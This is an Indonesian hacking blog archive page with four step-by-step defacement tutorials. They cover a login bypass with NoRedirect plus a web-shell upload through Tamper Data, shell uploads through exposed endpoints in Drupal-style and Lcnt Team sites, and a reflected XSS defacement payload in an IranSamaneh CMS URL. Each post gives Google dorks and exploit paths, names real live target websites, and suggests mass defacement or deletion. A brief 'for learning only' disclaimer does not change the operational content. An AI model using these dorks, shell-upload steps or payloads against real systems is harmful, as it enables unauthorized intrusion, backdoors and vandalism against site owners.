Home » Archives for April 2017

Bypass with NoRedirect and Tamper Data


Bypass with NoRedirect and Tamper Data

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Bypass with NoRedirect and Tamper Data

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Bahan Bahan :

1. Instal dulu Tamper Datanya
    Karena saya menggunakan Mozila silahkan instal disini dan ini juga ( harus kedua duanya :v )

2. Instal NoRedirect, Browser Mozilla => disini 

 Setelah di Instal Jangan Lupa Restart Mozilla Anda 

3. Shell Backdoor : Download ( Jangan Lupa Mengubah extensi .php menjadi .php.jpg )

4. Dork : - inurl:/admin/login.php
                  ( Kembangi Lagi 😆 )

5. Script Deface Ntapz : Disini


Step By Step :

1. Pastikan anda Telah Menginstal semuanya :v 



2. Dorking Ke Google inurl:/admin/login.php

3. Pilih salah satu web
     Disini saya akan menggunakan Live Target saya 


4. Buka NoRedirect
     Extension => Options => Add => "Masukkan Target" => Add => OK



5. Buka Link Target, lalu ganti login.php menjadi index.php atau home.php
     Contoh : http://delhifarms.com/adminPanel/login.php ubah menjadi http://delhifarms.com/adminPanel/index.php 

Jika Vuln akan Mengarah pada Dashboard admin

Saatnya Kita Mengeksekusi Mengunakan Tamper Data 😆

1. Cari pada Dasboard tempat Upload'an Image



2. Open Tamper Data pada Mozilla Anda
    Open Menu => Developer => Open Tamper Data



3. Start Tamper



4. Lalu Upload Shell anda yang berformat .php.jpg

Perhatikan Gambar



5. Jika ada Notif "Tekan Tamper"


6. Lalu Cari nama file shell kamu lalu ubah extensinya dari .php.jpg menjadi .php
    contoh : shell.php.jpg menjadi shell.php


7. Lalu Tekan OK

    "NB : Nanti akan Notif Tamper yang lain, tekan aja submit buat yang lain."


8. Buka Image Pada List di Dashboard tadi, Lalu Tekan klik Kanan lalu Copy Image Location


9. Lalu Buka deh Hasilnya.. 😊



Terserah Kalian Mau Di Apain Lagi 😆
Mau Lu Mass Deface atau Mass Delete Whatever 😆


NB : "Tutorial Tamper Data Juga dapat Digunakan Pada Web Yang Vuln Inject Admin tanpa NoRedirect"


Contact Me : Facebook



Sekianlah Postingan Dari All Tutoc Cyber tentang "Bypass with NoRedirect and Tamper Data" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "Bypass with NoRedirect and Tamper Data" Dengan URL https://ryangueltoem.blogspot.co.id/2017/04/bypass-with-noredirect-and-tamper-data.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber
Writer: Tio Alfandri
[ - ]
0 komentar | + Add
Tags: , ,

31337FileExists Upload Shell


31337FileExists Upload Shell

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan 31337FileExists Upload Shell

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Bahan Bahan :

1. Dork : - "31337FileExists"
                - "31337FileExists" inurl:"node"

2. Exploit : /sites/default/files/up.php

3. Shell Backdoor : 
    Shell mini ( Jika Shell biasa tidak support ) : Download

4. Script Deface : Download

Step By Step :

1. Dorking dulu di Google "31337FileExists"


2. Pilih Salah Satu Web
    Live Target : http://roundhousearchitecture.com/

3. Masukkan Exploit : sites/default/files/up.php
    contoh : http://roundhousearchitecture.com/sites/default/files/up.php

    Jika Vuln akan ada Tempat Upload
seperti ini
4. Tinggal Upload deh shell backdoor kalian 


Jika sukses akan seperti ini

5. Tinggal masuk deh ke akses shell yang udah di Upload 

    Akses shell : /sites/default/files/[nama_shell].php
    contoh : http://roundhousearchitecture.com/sites/default/files/guel.php


Dan BeginiLah Hasilnya



Terserah Kalian deh Mau di Apain Lagii 😆

Nitip Nick Stah
GU3LT03M


Sekianlah Postingan Dari All Tutoc Cyber tentang "31337FileExists Upload Shell" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "31337FileExists Upload Shell" Dengan URL https://ryangueltoem.blogspot.co.id/2017/04/31337fileexists-upload-shell.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber
Writer: Tio Alfandri
[ - ]
0 komentar | + Add
Tags: ,

Lcnt Team Shell Upload Vulnerability


Lcnt Team Shell Upload Vulnerability

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Lcnt Team Shell Upload Vulnerability

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Bahan Bahan :

1. Dork : - CopyRight 2006-2017 温州龙诚互联科技有限公司 Lcnt Team

2. Exploit : webtarget.coli/admin/pic_add.php?Element=shopspic

3. Shell Backdoor : Indoxploit => Download 
                                 Password shell : IndoXploit

4. Script Deface : Download

Step By Step :

1. Dorking dulu "CopyRight 2006-2017 温州龙诚互联科技有限公司 Lcnt Team" Ke Google



2. Pilih Salah Satu Web
    Live Target : http://www.wzican.com/


3. Masukkan Exploitnya : /admin/pic_add.php?Element=shopspic 
     Contoh : http://www.wzican.com/admin/pic_add.php?Element=shopspic

Jika Vuln Akan ada Tempat Upload



4. Pilih Shell Backdoor kamu lalu Upload



5. Jika Vuln Akan muncul Tempat Akses Shell kamu

Perhatikan Gambar


6. Tinggal Kalian Copas Deh Akses Shell ke Link

Dan BeginiLah Hasilnya




Mudah Bukan ?! 

Nitip Nick "GU3LT03M"



Sekianlah Postingan Dari All Tutor Cyber tentang "Lcnt Team Shell Upload Vulnerability" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "Lcnt Team Shell Upload Vulnerability" Dengan URL http://ryangueltoem.blogspot.co.id/2017/04/lcnt-team-shell-upload-vulnerability.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber
Writer: Tio Alfandri
[ - ]
0 komentar | + Add
Tags: ,

IranSamaneh CMS Cross Site Scripting [ XSS ]


IranSamaneh CMS Cross Site Scripting [ XSS ]

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan IranSamaneh CMS Cross Site Scripting [ XSS ]

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Bahan :

Dork : - intext:"طراحی و تولید: " ایران سامانه " " intitle:آرشیو

Exploit : fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=1396/01/16&p=2

XSS Script : Disini

Step By Step :

1. Dorking Dulu Ke Gugle : intext:"طراحی و تولید: " ایران سامانه " " intitle:آرشیو


2. Pilih Salah Satu Web
    Live Target : http://www.fardanews.com/

3. Masukkan Exploit fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=1396/01/16&p=2
Jadinya Begini : http://www.fardanews.com/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=1396/01/16&p=2

4. Tinggal masukkan Xss Script pada from_data= atau to_data=
    Contoh : http://www.fardanews.com/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=Touched%20By%20GU3LT03M%3C%2Ftitle%3E%3Cbody+bgcolor%3D%22black%22%3E%3Ccenter%3E%3Cmarquee%3E%3Cb%3E%3Cfont+color%3D%22lime%22%3E%3Ch1%3EFamily%20Attack%20Cyber%20Wash%20Here%3C%2Fh1%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fmarquee%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cb%3E%3Cfont+color%3D%22red%22%3ETouched%20By%20GU3LT03M%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cnoscript%3E%3C!--%27))%2C%40)%3Cmarquee%3EK%3C%2Fmarquee%3E&p=2

5. Jika Vuln Akan Muncul XSS Script Kamu



Live Demo :

http://www.tabnak.ir/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=Touched%20By%20GU3LT03M%3C%2Ftitle%3E%3Cbody+bgcolor%3D%22black%22%3E%3Ccenter%3E%3Cmarquee%3E%3Cb%3E%3Cfont+color%3D%22lime%22%3E%3Ch1%3EFamily%20Attack%20Cyber%3C%2Fh1%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fmarquee%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cb%3E%3Cfont+color%3D%22red%22%3ETouched%20By%20GU3LT03M%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cnoscript%3E%3C!--%27))%2C%40)%3Cmarquee%3EK%3C%2Fmarquee%3E&p=2

http://www.fardanews.com/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=Touched%20By%20GU3LT03M%3C%2Ftitle%3E%3Cbody+bgcolor%3D%22black%22%3E%3Ccenter%3E%3Cmarquee%3E%3Cb%3E%3Cfont+color%3D%22lime%22%3E%3Ch1%3EFamily%20Attack%20Cyber%20Wash%20Here%3C%2Fh1%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fmarquee%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cb%3E%3Cfont+color%3D%22red%22%3ETouched%20By%20GU3LT03M%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fcenter%3E%3Cnoscript%3E%3C!--%27))%2C%40)%3Cmarquee%3EK%3C%2Fmarquee%3E&p=2


Metode ini Masih Baru Jadi Use Your Brain Masukkin Exploitnya ^_^

&

Metode ini Juga Fake Mirror ^_^

Sekianlah Postingan Dari All Tutor Cyber tentang "IranSamaneh CMS Cross Site Scripting [ XSS ]" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "IranSamaneh CMS Cross Site Scripting [ XSS ]" Dengan URL https://ryangueltoem.blogspot.co.id/2017/04/iransamaneh-cms-cross-site-scripting-xss.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber
Writer: Tio Alfandri
[ - ]
0 komentar | + Add
Tags:

Banner 88x31

Join,Like,Follow Us

Label

Site Info

Banner & Link Teman

Music

Diberdayakan oleh Blogger.

Cari Blog Ini

Partners